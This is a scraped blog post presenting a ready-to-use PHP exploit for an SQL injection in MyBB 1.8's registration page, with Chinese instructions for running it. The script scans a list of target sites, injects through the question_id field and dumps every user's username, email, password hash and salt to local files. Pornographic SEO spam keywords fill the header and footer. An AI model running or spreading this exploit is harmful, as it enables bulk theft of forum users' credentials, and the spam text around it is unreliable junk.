<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      MyBB 18 SQL Injection Vulnerability

      <?php  error_reporting(0); ?>
      <form method="post" action="">
      Input a Url(for example:http://myskins.org/18/) : <br><textarea name="siteler" cols="35" rows="7"></textarea><br><br>
      <input type="submit" value="Get it!">
      </form>
      <?php 
      ob_start();
      set_time_limit(0);
      if(!file_exists("dumpsss")) mkdir("dumpsss");
      if(! $_POST['siteler']==""){
      
      $siteler = explode("\n",$_POST['siteler']);
      foreach($siteler as $sites){
      $sites=trim($sites);
              if(checkVulnerable($sites)) {
                  echo "[+] $sites Is Vulnerable!\n";
                  Inject($sites);
              } else {
                  echo "[-] Target Is Not Vulnerable\n";
              }
          }
      } else {
      }
      
      function Inject($site) {
         $get_website = parse_url($site);
         $website = $get_website["host"];
          $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select count(*) from mybb_users LIMIT 0,1)f)x))-- -");
          preg_match('!select \'(.*)\' AS!s', $html, $matches);
          $count = $matches[1];
          echo "[+] Count: $count\n";
      
          for($i = 0; $i <= $count; $i++) {
              if($count == 1) {
                  $num = "0,1";
              } else {
                  $num = "$i,1";
              }
              $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select concat(username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num)f)x))-- -");
              preg_match('!select \'(.*)\' AS!s', $html, $matches);
              if(isset($matches[1])) {
                  $split = explode(":", $matches[1]);
                  $username = $split[0];
                  $email = $split[1];
                  $password = $split[2];
                  $salt = $split[3];
                  echo "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n";
                  file_put_contents("dumpsss/$website.txt", "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n", FILE_APPEND);
              }
          }
      }
      
      function checkVulnerable($site) {
          $ch = curl_init();
          $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id='");
          if(strpos($html, "You have an error in your SQL syntax")!==false) {
              return true;
          } else {
              return false;
          }
      }
      
      function HTTPPost($site, $post) {
          $ch = curl_init();
          curl_setopt($ch, CURLOPT_URL, "$site/member.php");
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
          $html = curl_exec($ch);
          curl_close($ch);
          return $html;
      }
      ?>
      

       

      另存為xxx.php 文件,然后在網頁上執行,會在當前目錄下生成dumpsss文件夾,如果存在漏洞,則會將網站會員導出到里面txt文件。

      如果不存在漏洞,則會提示:[-] Target Is Not Vulnerable

       

      代碼在線查看\下載地址:https://ghostbin.com/paste/zs2mp

      posted @ 2015-08-16 07:02  安全大可  閱讀(1656)  評論(0)    收藏  舉報
      真正的安全感源自于自身的實力
      回頂部
      主站蜘蛛池模板: 天天摸天天碰天天添| 久久久久久亚洲精品成人| 五月婷婷久久中文字幕| 国产在线高清视频无码| 日本高清aⅴ毛片免费| 天天躁日日躁狠狠躁一区| 国产精品三级中文字幕| 精品人妻久久久久久888| 亚洲高清有码中文字| 中文字幕乱码一区二区免费| 国产精品ⅴ无码大片在线看| 国产av一区二区亚洲精品| 日韩精品人妻av一区二区三区| 中文字幕久久熟女蜜桃| 毛片内射久久久一区| 国产精品电影久久久久电影网| 五莲县| 亚洲国产午夜精品理论片| 亚洲午夜成人精品电影在线观看 | 国产精品www夜色视频| 日韩有码中文字幕av| 亚洲女初尝黑人巨| 国产自拍一区二区三区在线| 丁香五月激情综合色婷婷| 珠海市| 国产欧美另类精品久久久| 成码无人AV片在线电影网站| 人成午夜免费大片| 久热这里只有精品视频六| 亚洲乱码日产精品bd在线| 亚洲国产精品无码久久电影| 国产精品久久自在自线不卡| 午夜AAAAA级岛国福利在线| 日韩av裸体在线播放| 好吊视频在线一区二区三区| 婷婷99视频精品全部在线观看| 亚洲高潮喷水无码AV电影| 欧洲精品色在线观看| 丝袜美腿视频一区二区三区 | 亚洲欧洲一区二区精品| 成人中文在线|